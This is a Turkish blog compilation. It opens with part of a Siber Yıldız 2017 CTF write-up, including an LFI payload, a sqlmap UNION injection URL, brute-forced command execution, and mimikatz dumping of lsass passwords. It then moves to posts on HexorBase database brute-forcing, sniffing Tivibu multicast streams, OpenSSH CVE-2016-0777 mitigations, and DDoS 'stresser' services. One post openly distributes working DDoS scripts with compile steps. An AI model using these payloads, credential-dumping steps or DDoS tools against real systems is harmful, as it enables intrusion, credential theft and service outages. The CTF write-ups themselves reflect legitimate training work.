Şimdi bu düzelttiğimiz kodların içerisinde yukarıda bulunan ve benim dahil etmediğim bir var bulunuyor çünkü bunun içerisinde sadece kullanıcı adı bulunuyordu oda md5 formatında verilmişti.

2dfa843b02427819d8bdf8271bb84a3c

Şimdi burada belirlememiz gereken tek şey şifre idi koda baktığımızda kullanıcı adının uzunluğunun 8 şifrenin ise 9 olması gerektiği idi bunu attık kenara zaten kullanıcı adı “alpaslan” yani md5 değerinin çözülmüş hali idi

Şifreyi çözmek içinse şöyle bir yol izlendi

##Adım 1 -
_0x4831 HEX  > ASCII
"""
input[name="username"]
input[name="password"]
b5
1c44
c6
24c1
e6
2b93
da
1fd4
b1
2dfa843b02427819d8bdf8271bb84a3c
length
charCodeAt
charAt
Başarılı işlem
Hatalı işlem
Kullanıcı adı veya şix66re yanlış
submit
#loginform
ready
##Adım2
_0x4831[13] > MD5 Crack > alparslan

##Adım 3
_0x34b0x5  > HEX > Decimal
181
7236
198
9409
230
11155
218
8148
177

##Adım 4
alparslan > Stplit Keys > Char Code
97
108
112
97
114
115
108
97
110

##Adım 5
a-b OR a/b  > Char
181-97=84 T
7236/108= C
198-112=86 V
9409-97=97 a
230-114=116 t
11155/115=97 a
218-108=110 n
8148/97=84 T
177-110=67 C

Şifre olarak ise çözümlemeler sonucunda uzunluğu 9 olan bir şifre elde ettik TCVatanTC Ayrıca sayfanın title baktığımızda BS yazdığını da gördük yani alpaslan demek istediği Büyük Selçuklu olabilirdi yada bi s…. git diyerek küfür ediyo da olabilirdi ancak sonuca ulaşabilmiştir.

d66ab2522c55a041661ff6526c99c36d

Soru 6

“Holowy Conz den beklediğimiz mesaj geldi, acaba nedir ?” olarak karşımıza bir resim çıkıyor. Haliyle bu bir steghide sorusu zorlanacağımızı düşündüysek de 10 sn kadar bir süre aldı çözmemiz

soru6gorsel

Herhangi bir unhide sitesine giriyoruz ve resmi siteye yüklüyoruz. Bu iş için biz Image Steganography sitesini kullandık sonuç olarak bize aşağıdaki gibi bir çıktı geldi ve hemen bir barkod okuyucu ile cevabı aldık

soru6cevap

ve sonuç olarak kare barkod da “siberstar” çıktı bunun md5 değerini alıyoruz.

0b6f6a0a8520da0839e5e3075df924fa

Ancak haliyle cevap bu değil daha sonra biz düşündük ki Hackerın oğlu adlı CTF de bulduğumuz bir değer vardı google ve github araması yaparak bayrağa ulaşmıştık bu tarz bir soru olabileceğini düşündük ve direk olarak google aramalarına başladık

İlk olarak

  • github
  • gitlab
  • bitbucket
  • facebook
  • twitter

Derken twitter’da bir adet hesap çıktı karşımıza ve siber starımı arıyorsun? yazıyordu altında da ilginç ve bol aa içeren bir mesaj,

Daha sonra google araması yapmaya devam ettik bu neyin şifrelemesiydi yada neyi işaret ediyordu diye soru steg sorusu olduğu için googlede Twitter Steganography olarak arama yaptık karşımıza java ile yazılmış bir adet tool ve online bu işlemin yapılabileceği bir web sitesi çıktı direk olarak kopyala yapıştır yaptıktan sonra IRC kanalını işaret ediyordu haliyle bayrağı buradan elde ettik.


Soru 7

Algoritmada ne kadar hizlisin ? Bu soruda bize sıralı bir dizi vermiş ve bizden sıralı olarak gidenleri bulmamızı istiyor.

Bir silsileden(sequence) sifir yada daha fazla eleman atilarak elde edilen silsileye alt silsile denir. Alt silsileler arasinda silsile elemanlari sirali olanlara sirali alt silsile denir. Ornegin (1,5,6,3,4,2,9,10,11) silsilesinden elden edilen (1,5) ve (2,9,10) birer sirali alt silsiledir. Ayni zamanda (2,9,10,11) silsilesi en fazla uyeye sahip sirali alt silsiledir. Buna gore asagida elemanlari onaltilik (hexadecimal) sayi sisteminde verilen silsilenin en fazla elemana sahip sirali alt silsilesi nedir.

Not: Cevap (1,25,216) formatinda (bosluksuz,virgullu ve parantezli) olmalidir. Elemanlar onluk (decimal) sayi sisteminde olmalidir.

Soru Silsilesi:
(0x9a,0x85,0x9e,0xac,0xaa,0xc4,0xa4,0xbb,0xbe,0x9a,0x64,0x9e,0x8e,0x9b,0x70,0xb4,0x81,0xa3,0x81,0x9b,0x9c,0x68,0x68,0x8b,0x6b,0x83,0x70,0x81,0xb2,0xb9,0x75,0xa7,0xb2,0x98,0x7a,0x90,0x92,0xc0,0xbf,0x64,0x75,0x68,0x7a,0xc5,0xa2,0xaa,0xab,0xc4,0x78,0x6c,0xab,0xbb,0xb5,0x7c,0x95,0xa4,0xb2,0x73,0x84,0xa0,0x88,0x96,0x72,0x8d,0xac,0x85,0xa7,0xad,0x82,0x9d,0xab,0x99,0x7c,0x72,0x6d,0x6b,0x8c,0x8a,0xa7,0x7d,0x68,0x86,0xaf,0xbb,0x79,0x83,0x8c,0x7b,0x72,0xb2,0x6f,0x77,0xb6,0xb8,0xf4,0xF6,0x8c,0x67,0xb6,0xb5)

Hex formatında verdiği içinde buna göre bazı işlemler yapmamız gerekiyordu haliyle

liste="0x9a,0x85,0x9e,0xac,0xaa,0xc4,0xa4,0xbb,0xbe,0x9a,0x64,0x9e,0x8e,0x9b,0x70,0xb4,0x81,0xa3,0x81,0x9b,0x9c,0x68,0x68,0x8b,0x6b,0x83,0x70,0x81,0xb2,0xb9,0x75,0xa7,0xb2,0x98,0x7a,0x90,0x92,0xc0,0xbf,0x64,0x75,0x68,0x7a,0xc5,0xa2,0xaa,0xab,0xc4,0x78,0x6c,0xab,0xbb,0xb5,0x7c,0x95,0xa4,0xb2,0x73,0x84,0xa0,0x88,0x96,0x72,0x8d,0xac,0x85,0xa7,0xad,0x82,0x9d,0xab,0x99,0x7c,0x72,0x6d,0x6b,0x8c,0x8a,0xa7,0x7d,0x68,0x86,0xaf,0xbb,0x79,0x83,0x8c,0x7b,0x72,0xb2,0x6f,0x77,0xb6,0xb8,0xf4,0xF6,0x8c,0x67,0xb6,0xb5"
for i in liste.split(","):
    print int(i,16)

Şeklinde kodumuzu yazdık ve dönüştürme işlemine geçtik okunabilir hale aşağıdaki gibi getirdik ve başladık içerisinde gözümüz ile aramaya

[154, 133, 158, 172, 170, 196, 164, 187, 190, 154, 100, 158, 142, 155, 112, 180, 129, 163, 129, 155, 156, 104, 104, 139
, 107, 131, 112, 129, 178, 185, 117, 167, 178, 152, 122, 144, 146, 192, 191, 100, 117, 104, 122, 197, 162, 170, 171, 19
6, 120, 108, 171, 187, 181, 124, 149, 164, 178, 115, 132, 160, 136, 150, 114, 141, 172, 133, 167, 173, 130, 157, 171, 1
53, 124, 114, 109, 107, 140, 138, 167, 125, 104, 134, 175, 187, 121, 131, 140, 123, 114, 178, 111, 119, 182, 184, 244,
246, 140, 103, 182, 181]

Baktığımızda bizden istediği şu olabilirdi.

(124,149,164,178)

veya

(111,119,182,184,244,246)

En uzun olanı seçiyoruz burada çünkü bize en uzun olanı soruyor. Oda ikinci bulduğumuz idi hemen md5 değerini alıyoruz.

ce549031ea58a4a7493dde46a2c71357

Soru 8

Splinter’ın bilgisayarından önemli veriler aldık, bunların ne olduğu bul ve bize bildir. Bu soruda ise bize bir adet ne olduğu belirsiz bir dosya veriyor ancak dosyayı sistemimize indirip file ile baktığımızda bunun bir pcap dosyası olduğunu görüyoruz.

içerisinde ise host tarafına bağlanan bir USB belleğin paketleri bulunuyordu. “URB_INTERRUPT” ve cihaz bilgisi vs şimdi burada yapmamız gereken bir kaç işlem var öncelikli olarak bunlara karar verelim.

tshark -r splinter -T fields -e usb.capdata > dump.txt

İşlemi yaptık bu işlemden sonra bize bir takım MAC adreslerine benzeyen ama cihaz hakkında bilgi sağladığını biliyorduk hemen googlede ufak bir arama yaptık ve bu konuda google CTF de bir makele bulduk aramak o kadarda uzun sürmedi daha sonra bunun usb bellek olmadığını bir fare olduğunu anladık bu bizim içinde bir ilk oldu forensic konusunda eksik olduğumuzuda haliyle anlamış olduk 🙂

awk -F: 'function comp(v){if(v>127)v-=256;return v}{x+=comp(strtonum("0x"$2));y+=comp(strtonum("0x"$3))}$1=="01"{print x,y}' dump.txt > sirali.txt
-1084 -79
-1084 -79
-1083 -80
-1083 -86
-1083 -89
-1083 -97

ve devam eden satırlar gördük sonra makaledede belirttiği gibi gnuplot kullanarak bir çizim elde ettik bu çizimde ise fareyi_buldum yazıyordu. Bu değeri MD5 olarak çevirdiğimizde ise cevabı elde etmiş olduk

a9930510d6923f409fcdba49f8280a3f

Kullandığımız makale ise Google CTF 2016 Forensic


Soru 9

Şimdi de uygulamanın kullandığı veritabanı parolası lazım Sorusuna geldik soruya geldiğimizde bizi ilk başta bi 404 hatası karşılıyordu. Çoğu kişi bu sayfanın gerçek olduğunu sanıp soru çalışmıyor diye twitterdan yazmaya başladı aslında olay CTRL + U bastığımızda sayfanın en altında gizlenmiş bir div içerisinde bulunan form ile gerçekleşiyordu F12 aracılığı ile tarayıcı tarafında style dosyasında bulunan değerleri kaldırdığınızda karşınıza 2 adet input ekranı geliyor haliyle buralar basittir diyip direk olarak admin yazdık ve içerdeydik veya jsfiddle gibi araçlar ile admin değeri ile post isteği attığınızda içeriye girebiliyorsunuz.

Her neyse karşımıza şu şekilde bir ekran geliyor ve aşağıda da ufak bir hata bulunuyordu ayrıca link yapısına baktığımızda bunun bir LFI olduğunu anlamak hiçte zor olmadı

soru9siberyildiz

Şimdi bu hata ışında biraz kurcalayalım. Bir kaç alt dizine inmemiz gerekiyor aslında çok değil hataya bakıldığında maximum 3 dizin aşağıya gitsek bu iş tamam bunun için ise biz şöyle bir payload seçtik

../db.php

linkimiz ise şu şekilde olacaktı

dd96a95ce40af42633d10802bd419bc5/sanayihirsizligi/index.php?file=..%2Fdb.php

urldecode ettiğinizde yukarıda vermiş olduğum payload olduğunu anlayabilirsiniz. Bu bilgiler ışığında oluşturduğumuz link ile girdiğimizde flag bir anda önümüze çıktı FLAG: Om3rHal1sD3MIR Bu değeride md5 formatına çevirdiğimizdede cevabımız tamamen hazırdı zaten

soru9cevap
0ae4ce5c35afcc6f88501b24f8498c0f

Soru 10

Bu görev önünde iki seçenek var : başarılı olursun veya olamazsın Bu soruda ilk olarak bi login kısmı geliyor burası basit zaten adam sana admin olarak gir diyor.

Kullanıcı adı: admin
Şifre: admin

Peki bundan sonra ne geliyor. Komutu çalıştıracak şifreyi bulmaya ve komutu çalıştırmaya komut zaten ls ancak komutu çalıştırmak için bizden bir adet şifre istiyor. Biraz uğraştıktan sonra elime geçen bir wordlist aracılığı ile get metodu kullanılan linke zorlama yaptık ve şifre karşımıza çıktı adminlele

9f0f364f34fc230630922d7c4ce66d68/cannotfindme/?pass[]=adminlele&cmd=ls

Giriş yaptıktan sonra ise içeride 3 adet dosya gözüküyor bize oda şöyle ki

index.php
readme.txt
try.html

Bunlar içerisinde readme.txt ve try.html gözümüze çarpıyor. kontrol ediyoruz. try.html dosyası içerisinde ise aşağıdaki satır yer alıyor.

read file /tmp/isThatFlag.txt

Tabi burada bazı arkadaşlar gidip dosyayı bulup okumak isteyeceklerdir. Ancak ana bizim girdiğimiz dosyanın adının try olduğunu göz önünde bulundurarak direk yukarıdaki değerin md5 halini aldık ve sonuç olumlu oldu

fc5b4590ba6b20619556c126d7aa101f

Soru 11

Yapabileceğine inancımız tam. Bu sorudada öncelikli olarak linki baya bi kurcaladık ne var ne yok diye bakma isteği duyduk sonra get isteği atmaya sql map ile denemeye başladık ilk olarak yüksek hızlı tarama işlemi yapınca site requestleri drop etmeye başladı bizde dedik bu böyle olmaz bir takım kısıtlamalar ile taramaya devam ettik şu şekilde bir URL elde ettik

index.php?id=1' UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x756a64567375626642615a5042756b5551576d4345784d6e527a526545734a6c585a4a4745766175,0x71786b6271)-- mmYT--

Soru 12

Zararlı bir hacker’ın bilgisayarından veri elde ettik, içerisindeki hackerin şifresini bulabilir misin ?

Bu soruda bizlere bir dosya verilmişti.

  • Dosya ismi : usom-forensics

Bu gibi sorularda ilk olarak yapmamız gereken şey dosya hakkında bilgi almak için “file” komutunu kullanmaktır. Bizde bu soruda bu komu ile dosyayı incelediğimizde aşağıdaki gibi bir sonuç ile karşılaştık.

  • Komut: file usom-forensics
siber yıldız 2017 soru ve cevap, soru 12 çözüm

Bu bilgiden sonra “mv” komutu ile dosyanın uzantısını değiştiriyoruz.

  • Komut: mv usom-forensics usom-forensics.7z

Daha sonra “7za” aracı ile dosya içerisindeki veriyi çıkartıyoruz.

  • Komut: 7za e usom-forensics.7z
zip forensic, kali 7zip, siber yıldız cevaplar 2018

İçerisindeki veri tekrar file komutu ile incelendiğinde bir data olduğu bilgisini alıyoruz. Bu işlemden sonra volatility aracı ile incelemeye alıyoruz.

Bunun için ilk olarak image hakkında bilgi almak için aşağıdaki komutu kullanıyoruz.

  • Komut: volatility -f usom-forensics imageinfo
  • “-f”: incelenecek dosya tanımlanır.

RAM imajı analizi sorularında genelde ilk yapılması gereken şey, “pslist” komutu ile çalışan işlemleri listelemek ve sistemde o anda ki işleyiş hakkında bilgi sahibi olmaktır.

  • Komut: volatility -f usom-forensics –profile=Win7SP0x86 pslist
plist kali

Bu çıktı sonucunda dikkat çeken işlemler:

  • mspaint.exe
  • notepad.exe
  • lsass.exe

mspaint.exe dumpı alınıp gimp ile incelenip üzerine çalışılan resim üzerinden bilgi elde edilebilir. CTF lerde bu tarz sorular görüyoruz. Ancak böyle bir inceleme sonucunda aşağıdaki gibi bir sonuç ile karşılaştık.

flag değil, kali

Zaten bize sorulan şey bir parolaydı.

  • Soru: Zararlı bir hacker’ın bilgisayarından veri elde ettik, içerisindeki hackerin şifresini bulabilir misin ?

Bu nedenle volatility içerisinde kullanılabilen hashdump parametresi de denenebilirdi. Ancak burda da tatmin edici bir sonuç yoktu.

“pslist” dışında en çok işinize yarayacak bir diğer parametre “filescan” parametresidir.

Dosya üzerinde “filescan” çalıştırıldığında flag adı ile bazı dosyalar olduğu gözlemlenmiştir.

  • Komut: volatility -f usom-forensics –profile=Win7SP0x86 filescan
kali filescan

Bu veriler “dumpfiles” parametresi ile elde edilebiliyordu.

kali dumpfiles

Elde edilen bu verilerden flag.txt incelendiğinde lsass dump dosyasına ait bir link elde ediliyordu.

sorunun cevabı kali

Bu dump mimikatz ile incelendiğinde parola elde edilebiliyordu.

Adımlar:

  • privilege::debug
  • sekurlsa::minidump lsass
  • sekurlsa::logonPasswords
kali password, parola

Asıl Kaynak: Besim ALTINOK


Soru 13

Nedir bu sence ? Sorusunun ne olduğunu her ne kadar anlasak da cevaba ulaşamadık altın oran sorusu olup fibonacci ile rabbit seq arasında bir ilişki bulunmakta

Yardımlarından dolayı

  • Yasin YAMAN
  • Ömer İPEK
  • Yusuf GENÇ
  • Onur KOLAY
  • Furkan KALKAN
  • ve diğer tüm arkadaşlarıma teşekkürlerimi sunarım.

Birden Çok Veritabanı Sunucusunu Yönetme ve Denetleme

HexorBase, merkezi bir konumdan aynı anda birden çok veritabanı sunucusunu yönetmek ve denetlemek için tasarlanmış bir veritabanı uygulamasıdır; ortak veritabanı sunucularına (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL) karşı SQL sorguları ve kaba kuvvet saldırıları yapabilir.

haxorbase

Paket yönlendirmeyi, yerel alt ağlar içerisinde gizlenen uzaktan erişilemeyen sunucularla iletişim kurmak için proxy vekilleri için veya Metasploit için izin verir.

Gerekenler

  • python
  • python-qt4
  • cx_Oracle
  • python-mysqldb
  • python-psycopg2
  • python-pymssql
  • python-qscintilla2

Bağımlılıkların kurulması

sudo apt-get install python-qt4 python-mysqldb python-psycopg2 python-pymssql python-qscintilla2

cx_Oracle Kurulumu

pip install cx_Oracle

Uygulama Kurulum

wget https://github.com/savio-code/downloads/raw/master/hexorbase_1.0_all.deb
sudo dpkg -i hexorbase_1.0_all.deb

Uygulama her ne kadar eski olsa da oldukça işe yarıyor. Özellikle uzaktan yönetmek için hepsinin birleştirilmiş olması benim hoşuma gitti kaba kuvvet saldırıları gibi işler için kullanmanızı önermem ancak yönetim ve denetleme işleri için güzel

Tivibu Ev Yayınlarını Bilgisayar ve Telefonda Stream Etmek

Yasal uyarı: Bu blog yazısı eğitici amaçlarla yazılmıştır. Bu yazıdaki bilgilerin kötü amaçlarla kullanılmasından doğan zararlardan dolayı mesuliyet kabul etmiyorum.

Tivibu, Türkiye’de internet üzerinden veri akışıyla gerçekleşen Internet TV alanında yapılmış çalışmalardan birisidir. Tivibu ev, mobil ve bilgisayar gibi kullanım seçenekleri vardır.[1]
Bu anlatacağım yöntem için Tivibu Ev üyeliğinizin olması gerekmektedir.Çünkü Tivibu Ev, Tivibu’nun diğer platformlarının aksine IGMP adı verilen teknoloji kullanarak UDP Multicast Streaming ile çalışmaktadır.

Biraz Elimizi Kirletme Zamanı

Ağdaki IGMP paketlerini okumak için Wireshark yazği yazılımını kullanıyoruz. Çünkü Wireshark tüm trafik içerisinde IGMP paketlerini filtreleyebiliyor. Bunun için Wireshark’ı kullandığımız arayüzü dinleyecek şekilde başlatıp “Filter:” kısmına kısaca igmp yazmamız yeterli. Fakat gördüğünüz üzere bu karşımıza bir sürü IP adresi çıkıyor:

ExjelYz

Şuan izlediğimiz kanala ait multicast yayınını bulabilmek için öncelikle geri dönüş için kullanılan IPleri tahmin edip filtrelememiz gerekiyor.

  • Araştırmalarıma göre 224.x.x.x şeklindeki IP adresleri IGMP istekleri tarafından kullanılıyor (Yayın alma isteği ya da Yayından çıkma isteği) yani video verisi içermiyor. Bunları Filter: igmp and not ip.dst==224.0.0.0/8 ile filtreleyebiliriz.
J2szjCG
  • Kalan 239.x.x.x şeklindeki IP adresleri ise Multicast için atanmış IP adresleriymiş. Yani video verisi içeren adres bu iplerden biri olabilir.
  • Mantıken stream adreslerinin birbiri ardına gitmesi gerekiyor, mesela 239.x.x.1, 239.x.x.2, 239.x.x.3 gibi. Örnek tablomuza baktığımızda bize en yakın ip adresleri 239.254.0.x şeklindeki adreslerdir. Fakat henüz hangi IP’nin stream verisi içerdiğini bilmiyoruz.

Peki Hangisi ?

Bunu anlamanın tek yolu denemek. Buna göre 239.254.0.16:1234 adresi aradığımız adres. Voila !

ejEJ7GU

Ufak Düzeltmeler

Denemelerime göre RTP protokolü UDP’ye göre daha düzgün bir görüntü sunuyor fakat ne yazık ki her iki protokolde de aşırı hareketli görüntülerde görüntünün çizgi çizgi taranmış gibi gözükme problemi var. Bu problemiyse VLC -> Görüntü -> Taramasızlık -> Açık yolunu takip ederek çözdüm. Ayrıca işin güzel yanı televizyonda o kanal açık olmasa bile PC veya Telefonda o kanala ait akışı seyredebiliyorsunuz.

Yayın akışı Androidli tablet ve telefonlarda MX Player ile sorunsuzca izlenebilir.

Herkese iyi seyirler 🙂

Furkan KALKAN Tarafından yazılmıştır.


Not: Burada yazanlar teknik açıdan eksik ya da yanlış bilgiler içeriyor olabilir. Bu durumda lütfen alttaki yorum kutusunu kullanın.

Ddos Saldırısı İçin Kullanılabilecek Scriptler

Vakti zamanında testler için kullanmış olduğum ve halen çalışmakta olan DDoS kaynak kodlarını artık paylaşma zamanın geldiğini düşünmekteyim. C dili ile yazıldığı için oldukça etkili ve bir o kadarda hızlıdır. Aynı zamanda python ile yazılmış olanlarda bulunmaktadır, lakin kodlar booter sistemlerine yazıldığı için sürelidir sınırsız bir şekilde kullanamazsınız.

Ddos ve dos için kullanılacak olan tüm kaynak kodları derlemek için aşağıdaki adımları izlemeniz gerekmektedir.

apt update
apt install build-essential
gcc betikadi.c -pthread -o betikadi
ShellScript

Derleme işlemi sırasında bağımlılıklardan dolayı uyarı mesajları verebilir. Bu durumda bir sıkıntı olmayacağı gibi kodlar sorunsuz bir şekilde çalışacaktır. Bazı betikler reflection.txt dosyası istemektedir.

L4 ve L7 karışık olarak verilmiştir, ayrıca UDP ve TCP olarak da sunulmuştur.

Kullanabileceğiniz kaynak kodlar

https://downloads.mertcangokgoz.com/ddos-scripts

Bu Kaynak kodlarından doğa bilecek her türlü sistemsel ve (veya) yasal sorunlardan kodları kullanan kişi sorumludur.

OpenSSH Kritik Güvenlik Zafiyeti

OpenSSH projesinde 15 Ocak itibari ile tespit edilmiş ve sunucu tarafındaki gizli anahtarların çalınmasına yol açabilecek olan kritik güvenlik zafiyeti CVE-2016-0777 ve CVE-2016-0778 kodu ile yayınlanmıştır.Etkilenmiş olan sistemlerde bu açıktan faydalanmak için aşağıdaki uygulamayı kullanmak mümkün

CVE-2016-0777 Exploit

Bu zafiyetten etkilenen işletim sistemleri ise şunlardır;

  • CentOS Linux 7.x
  • RHEL (RedHat Enterprise Linux) 7.x
  • Debian Linux (squeeze, wheezy, jessie, stretch, and sid release)
  • Ubuntu Linux 15.10
  • Ubuntu Linux 15.04
  • Ubuntu Linux 14.04 LTS
  • Ubuntu Linux 12.04 LTS
  • SUSE Linux Enterprise Server 12 (SLES 12)
  • SUSE Linux Enterprise Server 12 Service Pack 1 (SLES 12 SP1)
  • SUSE Linux Enterprise Server 11 Service Pack 4 (SLES 11 SP4)
  • SUSE Linux Enterprise Server 11 Service Pack 3 (SLES 11 SP3)
  • openSUSE 13.2
  • openSUSE Leap 42.1

Etkilenen sürümler ise 4.7 ile 7.1 arasındaki tüm sürümler olarak tespit edilmiştir.

Bu Zafiyetden etkilenmemek amacıyla sisteminizde aşağıdaki değişiklikleri gerçekleştirdiğiniz taktirde güncelleme yayınlanana kadar korunmuş olacaksınız.

FreeBSD

sudo -s
echo 'UseRoaming no' >> /etc/ssh/ssh_config

Tüm Linux Sistemler

sudo su
echo 'UseRoaming no' | sudo tee -a /etc/ssh/ssh_config

MacOS Sistemler

echo "UseRoaming no" >> ~/.ssh/config

OpenBSD

su -
echo -e 'Host *nUseRoaming no' >> /etc/ssh/ssh_config

CVE-2016-0778 Zafiyetinden kurtulmak için ise

Sistemlerinizi güncellemeniz yeterlidir.böylelikle CVE-2016-0778 zafiyetinden kolaylıkla korunabilirsiniz.

Debian Tabanlı Sistemler

sudo apt-get update
sudo apt-get upgrade

CentOS

sudo yum update

FreeBSD

freebsd-update fetch
freebsd-update install

En iyi 3 Stress Test Aracı

Stress test araçları günümüzde oldukça fazla yaygın bir biçimde kullanılan legal çalışma ortamlarıdır.kendiniz oluşturabileceğiniz gibi hazır olarak piyasada bulunan siteleri ve uygulamaları da kullanabilirsiniz.Oluşturmuş olduğunuz dış dünyaya yayın yapan bir sistemi bir çok tehlikeli durum bekler bunlardan belkide en sık karşılaşılan Ddos ve botnet gibi popüler olan saldırı çeşitleridir. Ücretli olarak bir test ortamı edinebilirsiniz tabi ki bunlar legal çerçevede gerçekleşecek

1.Critical Boot

Oldukça güçlü ve sırf bu stress işleri için kullanılan özel alt yapıları bulunmaktadır. Maximum test edilebilir kapasitesi 70 Gbit olarak ölçülmüştür. Yapılan testler ve(veya) saldırılar bilginiz dahilinde gerçekleşmiyor ise abuse işlemi ile saldırıyı kimin gerçekleştirdiğini detaylı olarak öğrenebilmeniz mümkün(İP bilgisi,kullancı adı ve mail bilgileri)

stresstestcritical

2.Stage Stresser

Gerçekleştirilen her bir testin ve veya saldırının boyutu 10 gbit ile limitlenmiş olup oldukça etkili yöntemler ile sistemlerinizi test edebilirsiniz.5 adet yöntem bulunmaktadır.Korumasını sağladığınız yada olduğunu düşündüğünüz yöntemleri bu sistem ile test edebilme imkanınız bulunuyor.legal çerçevede gerçekleştirilecek olan bu yöntemde izinsiz yapılan saldırılar sonucunda gerekli bilgiyi firmadan talep edebilirsiniz.Toplam network kapasitesi 200Gbit olarak bilinmektedir.

stagestress2

3.Thunder Stresser

Gerek koruma hizmeti sağlayan gerekse test ortamı sunan bu firmamızda ise her zamankinden yüksek network kapasitesi görmekteyiz yaklaşık olarak 400Gbit toplam kapasiteleri bulunmakta saldırı ve savunma taktikleri için oldukça faydalı üstelik web sitesi size telefon uygulaması ile de farklı bir test ortamı sağlıyor.Legal olarak yapacağınız tüm stress testlerinde ve saldırılarda bir sıkıntı çıkmayacaktır.İzinsiz bir test işlemi görüldüğü taktirde firma ile gerekli yazışmaları yaptığınız da direk olarak kimin ne yaptığı bilgisini edinebilirsiniz.

thunderstress3

Bir kez daha hatırlatmamda fayda var yukarıdaki test yöntemlerini illegal bir biçimde kullanmanız dahilinde şikayet olunduğu taktirde çok ciddi yaptırımlar uygulanmaktadır.Lütfen kişisel ihtiyaçlarınız ve test işlemleriniz dışında kullanmayınız.